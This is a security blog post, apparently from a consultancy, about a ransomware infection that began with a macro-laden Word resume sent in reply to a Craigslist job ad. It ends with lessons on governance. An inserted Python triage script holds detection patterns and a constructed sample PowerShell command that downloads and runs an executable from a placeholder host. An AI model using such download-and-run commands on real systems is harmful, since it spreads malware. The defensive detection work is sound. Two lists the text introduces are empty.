
Technology Can’t Fix Governance: A Case Study in Ransomware

Examining a real-world ransomware incident, this post details why technology alone can’t solve governance failures—and how mission-driven organizations can strengthen security through improved policies and operational clarity.

The Situation

An organization that recently hired us was the victim of a ransomware attack earlier this year.

A senior member of the organization called the help desk to report that all of the files on his computer had been encrypted, and it would cost around $1,000 USD to get his files back.

The organization had strong technical controls in place, including:

Despite these measures, the attack occurred. The organization’s technical staff reached out for assistance. A brief investigation revealed an unexpected weak link.

The Attack Path

The department involved in the attack was in the midst of recruiting for an open position. In an attempt to attract a larger pool of applications, the department posted the job description to Craigslist rather than using the organization’s formal recruitment portal. Applicants were instructed to reply to a mailing list, so resumes would be shared with everyone on the search committee.

Shortly after the posting, applications began to arrive. Since members of the search committee were expecting emails with attached resumes, it did not seem unusual when an email arrived with a password-protected ZIP file and the password included in the email body.

Once unzipped, the ZIP file revealed a Microsoft Word document containing a macro—a small computer program embedded within the document.

The obfuscated text inside the macro was a Base64-encoded string. Decoding it revealed the macro’s true intention.

After a user opened the Word document and enabled macros, the script launched. PowerShell on the local Windows computer executed the embedded script, retrieving a malware executable from a remote host and running it—leading to infection.
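A triage sketch for the step described above, added here as an example and not taken from the incident or the original post: it decodes Base64 strings found in macro source and flags text that both downloads and executes. It assumes the macro source has already been extracted to plain text; the function names, the 24-character threshold, the indicator list, and the sample macro are all constructed for illustration.

```python
import base64
import binascii
import re

# Runs of base64 characters long enough to hide a command (the length 24 is an assumption).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Indicators for the behaviour the post describes: fetch a file, then run it.
INDICATORS = {
    "download": re.compile(r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest", re.I),
    "execute": re.compile(r"Start-Process|Invoke-Expression|\bIEX\b", re.I),
    "url": re.compile(r"https?://[^\s'\"]+", re.I),
}

def decode_candidates(blob):
    """Decode one base64 run; keep decodings that are readable ASCII text."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except (binascii.Error, ValueError):
        return []
    texts = []
    for encoding in ("utf-16-le", "utf-8"):  # PowerShell encoded commands are UTF-16LE
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        readable = sum(c.isascii() and (c.isprintable() or c.isspace()) for c in text)
        if text and readable / len(text) > 0.9:
            texts.append(text)
    return texts

def triage_macro(source):
    """Return one finding per decodable base64 string in extracted macro source."""
    # Undo VBA string splitting such as "abc" & _ <newline> "def" before scanning.
    joined = re.sub(r'"\s*&\s*(?:_\s*)?"', "", source)
    findings = []
    for match in B64_RUN.finditer(joined):
        for text in decode_candidates(match.group()):
            hits = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
            findings.append({"decoded": text, "indicators": hits,
                             "suspicious": {"download", "execute"} <= set(hits)})
    return findings

# Constructed sample, not from the incident: inert host and hypothetical file name.
SAMPLE_CMD = ("(New-Object Net.WebClient).DownloadFile("
              "'http://example.invalid/a.exe','a.exe'); Start-Process 'a.exe'")
SAMPLE_B64 = base64.b64encode(SAMPLE_CMD.encode("utf-16-le")).decode()
SAMPLE_MACRO = ('Sub Example()\n  s = "' + SAMPLE_B64[:40] + '" & _\n      "'
                + SAMPLE_B64[40:] + '"\nEnd Sub\n')

if __name__ == "__main__":
    for finding in triage_macro(SAMPLE_MACRO):
        print(finding["suspicious"], finding["indicators"], finding["decoded"])
```

A finding marked suspicious is a reason to quarantine the attachment and examine it further, not a verdict; a macro that encodes its payload some other way will not be caught by this check.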

The Outcome

In this case, the organization had robust offline backups, ensuring the availability of critical data. No ransom had to be paid; the system was re-imaged and the user’s data restored from that morning’s backup.

Lessons Learned

This incident underscores the need to address all three components of the cybersecurity framework:

Even with advanced technical controls, staff can unwittingly put the organization at risk. Without formal governance—policies, procedures, and clear accountability—workarounds become easy. In this case, a department bypassed established hiring protocols with good intentions but poor risk awareness, leaving the organization exposed.

The key: focus your cybersecurity program on people, processes, and technology. Technology may be the easiest component to implement, but governance and continuous commitment to sound processes are critical. Do not underestimate their importance.
